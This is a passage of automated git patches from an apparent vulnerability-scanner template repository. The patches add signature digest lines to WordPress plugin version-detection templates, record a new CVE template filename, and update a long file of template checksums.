490a0046304402202cb9c2db67ac9534108d8c6b1406a97e10352c489efb70e6dda5e5a9333a413f02205f59c15415a540019377ea31645e3912fbc27f32a0df6a123f9b10ee47a9e874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..0b1d518d54 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205dbf48063486a8907f70f9c402566807d57f2364135d741e5bb5d873dafb9635022100ecff212620107fffd44dc5b2bd707c0a47f6b39e431dde17fd6e32528534f42c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..8e5a8699cc 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220518067e1e70ce52300a43e6d9ff6791c7101b8f5538ffba112ae559247a784a7022035c7c171c3488ed33d4f341bc7fee48c27e9f6463948316edb90a3e3801eb0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..927904a5fb 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022077aed1e06cfdacc3acb70d82ab0326e8cf64d7c38e2fe8a819e0afe80e8aedaf02204543ac4ad8756ed3518e055c0a2da4c7c38617a7e8c50a55aa9c01943b6597cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..c33f5eb803 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205fe6f26454b19385a761743d368ab1986f373387c254612249dcfec92a31f34402204799bf5273cecebafd03f9af758a8182f89b8340db1a67bfa38820fd81ff74c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..388cef737b 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e8e1a8dbcd22ef8beb3981c739e7f3aa5f77749175654b30de9705dc79af5a35022032006c959ae363fb8cc658279887dc2df3ca7945ef4db8ef09cab67c4a14bdfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..6a83958310 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022038be24b1471867a4e6559815e3734af2cb5c91fb5c0dee8306251b3dedebec52022100fac7e84f2787ec75419b7bb30036e16041ff69596b587c5ff95864002b4c0258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..751d537eb8 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206977735801c3c11d3e448644ccf59f142bbb2d8fff5d546eb8d4e16581e59c70022008a8c9142d356126752ce4761836e77eb0804e25ea054225a2534772afbfe0fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..d2c6862e83 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d8daf0533cc32ae14ba756af1b1c29ebef8e9f8ab280f4d7bc3af3dc17de67e0022044d21d3be8398b5ed686abd4bd3a617502923defac1f8d866747646f6fedb0cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..74038a023d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220641d793612f24ca009d78b610511f19890a66e3e5e05e992500e58a841795044022100cfcf1f565b64c8aece68886e356c1039d4e2b2d4c736f55fb1660cc7d6c922da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..604302993d 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022026791cd9acff1bf94d28588550e6e995fe8f948d22e8fa9a3309c9c7d5ca9e460221009ea0da672696cf2c4892935aea727f1ce03f1dde3106b1222c83e756eecdaffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..5e6104a69c 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220191d63150d7844b8db071f8a4cd08f82ed79eed2495a451bc816299736e3287d0220337eaa2521f80c5391de8bfe7f31dec8bce2886a45aaa3ca5697e38ca53d43c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..f42d9ccd4b 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068403e553ab5ad172e906f56cec5e06516a9e495bc342600c8038038d32d848102200d96e8deabb4232f3f773d13340492fa30e586282ac9043347671fe242f585d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..81f3fc8a48 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e4de1fecefab120ad66d3bb2cf8e4c04d2b3b3991001a0cfb685db556df51e1d0221009cd3bdbced580b6d02fde0dd3a5920c3f44ab8e14256b47fcd7bd58b89850817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..e68beefa21 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb9873ca96f4ffbed83bf32a4d711976e30b70000936c5b2c463e6269888417c02206f795632b80edd34f48125c997001a204350c685d233403236edeede678e5f72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..b000a9209a 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220764615f0f4d3063b2a603ea23420ad8b94e4f6a56877f52d0d592524b8023272022060324c935a152f8c0998091ac60a1b521ba1637ff081973af22e774b31c44434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..47cd787135 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009299b4b55776a3f4760ea93b478ff6bc1ac45ac6095b70695996446ba4ab3dbb022036622d2c3b9e46fcdd6ecae7fcf62adb957d98ce96dfd973c571db6afe86c305:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..46c358532e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206bae4477bedd6ed4611ed53de9a1a084ef07642ee2bea7a41faf6ac3e27f49f7022100c828c32ac6d89f6effe09e893b169c317e25240a8cbe7501ed5055e06c32b1cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..108013b6f1 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b865e41c8a831efd20a4afb60a782a7b8d6c1b45170cfb2787f73eb7e892c9b022100d5778966975d0459eb3dbd9af2ad4e9f2f5025144220e21d582fcfce281fb873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 58e5e828bf..bb6e496fd3 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e41ffc2988cab642f91f6dcb57b06876592d07cb0baf910acfca44a05ccf031502206ed3d20ac42124f378c303c34f7417605427f07a8de70b37928a626311b80f9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..48734b5653 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3caea72888f8831d241de83afb55c4a148b3a1a79d96be19eb6e5ed4c3b2ba8022100d3cfe29194e339836ae4d6b871c7d6cbd586428441d2bc9a1f9ebda32a937e64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..b1fff898aa 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202a58e89becd2f5e42217eeaf19a41e393767675f04b6080b751af9a81f3986110220171fb9948f01e262e6b0a4170d542f05aed3e16cd01fe7cfb1e0780cfaab1a95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..d7450fb5da 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023549d41310c42cb39723e7086c4a77a91e3e34eae4068a47ab756a1fc654eed02204f4dc090ac80f8a54c97a7bcd66a5f0cfe0597b7dbde140527b71068e9d46b31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0d613165fb211dbe92eab488e169ec91304ce8d8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 09:55:35 +0000 Subject: [PATCH 0663/1841] Auto Generated New Template Addition List [Thu Jun 27 09:55:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a31929f0e5..3a597d9fa3 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ http/cves/2023/CVE-2023-41599.yaml +http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-34102.yaml From 555afb8630c60ba9a3fd1c992d625f936d51184f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 09:55:42 +0000 Subject: [PATCH 0664/1841] Auto Generated Templates Checksum [Thu Jun 27 09:55:42 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d2b1b14c13..0d34738167 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3325,6 +3325,7 @@ http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62 http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8 +http/cves/2023/CVE-2023-52251.yaml:f7c72d3f186332cd3dd13119b51e1aff558b9f8a http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 http/cves/2023/CVE-2023-5375.yaml:c2c3a1f499a12f579dd2808bc0f40ed32cef2ecc @@ -3443,7 +3444,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 -http/cves/2024/CVE-2024-34102.yaml:c9a3eb48e7147fc3f4c8e78924ec9cbdc47d7cb1 +http/cves/2024/CVE-2024-34102.yaml:2152d70ae35f98d6968fad641af063bdd7b8f83b http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 @@ -7214,227 +7215,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:ddc246e8ec8247409d160c0ea967635d8f16515a +http/technologies/wordpress/plugins/add-to-any.yaml:cab6c2aeee9e5f36121f61e74c151619d915f99d +http/technologies/wordpress/plugins/admin-menu-editor.yaml:4109eb68ddfe89f983c287af2e3f6d0e20cfef91 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:4161c67c19146d374cbd2351dee1c0fd1df0d6d5 +http/technologies/wordpress/plugins/akismet.yaml:d95f479bf079646e1348e58de52204b8c24430ab http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:26d96578e2eb406f544b58a7e67cc0cfc33a3213 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:f5a2bae439c43f2ea2dd678f4691a9460b31191d +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:12c2ab4fc4a695fb1b92eaa6b8ba16c717b1ce8c +http/technologies/wordpress/plugins/amp.yaml:9aa8e4968beee281f18035f22b4cbc2e30b25fc5 +http/technologies/wordpress/plugins/antispam-bee.yaml:caef0420e57b40acd303795134e8db6523b909af +http/technologies/wordpress/plugins/astra-sites.yaml:b887cb9369eb9a3a391d93592acbd27dbbc8dca3 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:9e0e3f13cf9b85800f0ccfaf3c12937fb37b7179 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:2e7d16d9e6435a608d3242e9d215925abcb818f0 +http/technologies/wordpress/plugins/backwpup.yaml:94595b24f619a9c782664fed74eb9525d2e8d9b6 +http/technologies/wordpress/plugins/better-search-replace.yaml:3da7567d74f4ab970ebd79cd5d163557b8f44b69 +http/technologies/wordpress/plugins/better-wp-security.yaml:e6ef5e3478fbbb5a0df5d694668c358e9d3f8270 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:483b00ca3502f81dabdfef24bc16d90080aa62c4 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:7712b8fe19e4b174708c0ed1e7f31bf8ea15e8e3 +http/technologies/wordpress/plugins/breeze.yaml:7b245de005aefdac960e995076ee93bd526feaff +http/technologies/wordpress/plugins/broken-link-checker.yaml:155547557c6efcb0b2cce11375b985ae0f401d8e +http/technologies/wordpress/plugins/child-theme-configurator.yaml:1d5996870db803acafa909f04e7d961ad55d29bc +http/technologies/wordpress/plugins/classic-editor.yaml:28f175f85788476ddc7d0ff0175f978ae0b0fae4 +http/technologies/wordpress/plugins/classic-widgets.yaml:12b16d36ceb4ffd10a35050bfa22364049df6aa9 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e65da6529fca1f70a342c53739afce67e1f00e98 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:51b9395d9795c595bac0b209052dd2ebbf2304de +http/technologies/wordpress/plugins/coblocks.yaml:d0bdeab2be72834c96daa2ebaedeae6fdfd2333c +http/technologies/wordpress/plugins/code-snippets.yaml:80f67bd7bfe3a89c709185fdfff352962efba298 +http/technologies/wordpress/plugins/coming-soon.yaml:b89765ba3b7e24ea26eb57e4b9ad3ecc7c5562e0 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:1e685d463d34ad66501134f1ba20f476c4b513f8 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:7a9f942cb56851afeb94f7ba2ea34ff6eb1c0216 +http/technologies/wordpress/plugins/contact-form-7.yaml:4347a9b3b8763002d0679a762c3e752e3e56afbf +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:d7a8474afa358ae7fd373baf3ed62f921111d732 +http/technologies/wordpress/plugins/cookie-law-info.yaml:63678dd0817d943629d0918d1937cbe70ebff04c +http/technologies/wordpress/plugins/cookie-notice.yaml:9fe2c8374b1c8c00a81d6b7569a1338630cfb59d +http/technologies/wordpress/plugins/copy-delete-posts.yaml:e80ed1cd0b7d485b42f79ec79053682c18475c4e +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:f5cb9c483ca0876e0294d903fee67ae0b1bda9e1 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:01ee1ce92a50b471948ee4ddfd04611d8a28a40a +http/technologies/wordpress/plugins/custom-css-js.yaml:e38ed28718d1d537d083fb0fb87a2225cc8c6a48 +http/technologies/wordpress/plugins/custom-fonts.yaml:68bbacdafcdd3034d300824e7f026c6e1a88f65a +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:02ded27aff49addcbae0bcc030346bada13dcb5f +http/technologies/wordpress/plugins/disable-comments.yaml:0f7954492d139f1a9c419670620af368244ecc6c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:9d79202fab776a10fe8bae90bfacfdf1e832dcc1 +http/technologies/wordpress/plugins/duplicate-page.yaml:eb141f238cc3e96e9be481d96c83197f83fb42a5 +http/technologies/wordpress/plugins/duplicate-post.yaml:cb8e0040ab6cc3bd353690c89bee3a45b7da8159 +http/technologies/wordpress/plugins/duplicator.yaml:83370c792931244136a8e858bbc3abfd3ba98c0a +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:ce19e0015e680b750c03394757be8ed6a838ff42 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e 